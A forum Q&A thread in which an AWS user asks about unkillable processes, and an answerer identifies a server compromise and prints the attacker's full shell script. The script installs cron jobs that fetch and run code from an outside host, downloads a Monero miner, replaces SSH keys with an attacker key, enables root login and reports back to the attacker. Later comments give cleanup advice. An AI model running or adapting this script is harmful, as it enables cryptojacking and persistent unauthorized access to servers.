# AWS unnecessary script

Tags: amazon-web-services

I am using aws and last couple of days I am seeing some unnecessary scripts running. Following is screen shot attached.

I tried to killed that process by sudo kill -9 {pId} but not able to do so.

Any suggesstion[image]

Comment: Are you not using SSH keys?

Answer (score 4):

Your box got compromised.

It downloads a script to your server and runs it

```
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/2 * * * * curl -L https://r.chanstring.com/api/report?pm=1 | sh" > /var/spool/cron/root
echo "*/2 * * * * ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr &" >> /var/spool/cron/root
# echo "*/2 * * * * ps auxf | grep -v grep | grep gg2lady || nohup /opt/gg2lady &" >> /var/spool/cron/root

if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
    mkdir -p ~/.ssh
    rm -f ~/.ssh/authorized_keys*
    echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
    echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
    echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
    echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
    echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
    /etc/init.d/sshd restart
fi

if [ ! -f "/opt/yam/yam" ]; then
    mkdir -p /opt/yam
    curl -f -L https://r.chanstring.com/api/download/yam -o /opt/yam/yam
    chmod +x /opt/yam/yam
    # /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr
fi

# if [ ! -f "/opt/gg2lady" ]; then
#   curl -f -L https://r.chanstring.com/api/download/gg2lady_`uname -i` -o /opt/gg2lady
#   chmod +x /opt/gg2lady
# fi

pkill gg2lady

yam=$(ps auxf | grep yam | grep -v grep | wc -l)
gg2lady=$(ps auxf | grep gg2lady | grep -v grep | wc -l)
cpu=$(cat /proc/cpuinfo | grep processor | wc -l)

curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg2lady=$gg2lady\&arch=`uname -i`
```

As you can see it deletes all ssh keys and creates a new one for the attackers to login.

At the end of the script it reports its status to
`curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg2lady=$gg2lady\&arch=`uname -i`

this server again so they can look at all compromised servers at once I think

Edit:
The domain is registered in Panama. Whoopsie. I think you should check your server and get some advice regarding the security of it.

Comment: You are right . So what Should I do? How they have done so ?

Comment: Can't say what they used to get this on your server but it is some service either you installed which has a backdoor or the system itself has a vulnerability

Comment: How can I stop this? Any Idea ? or from where they Have installed this ?

Comment: First edit your cronjobs. The script creates some which are run every 2 minutes.  They will redownload everything you try to delete. After that delete the applications like yam in /opt/yam/yam and gg2lady in /opt/. After that you should be fine but I think they cracked your password. Is it a easy one which everyone can bruteforce?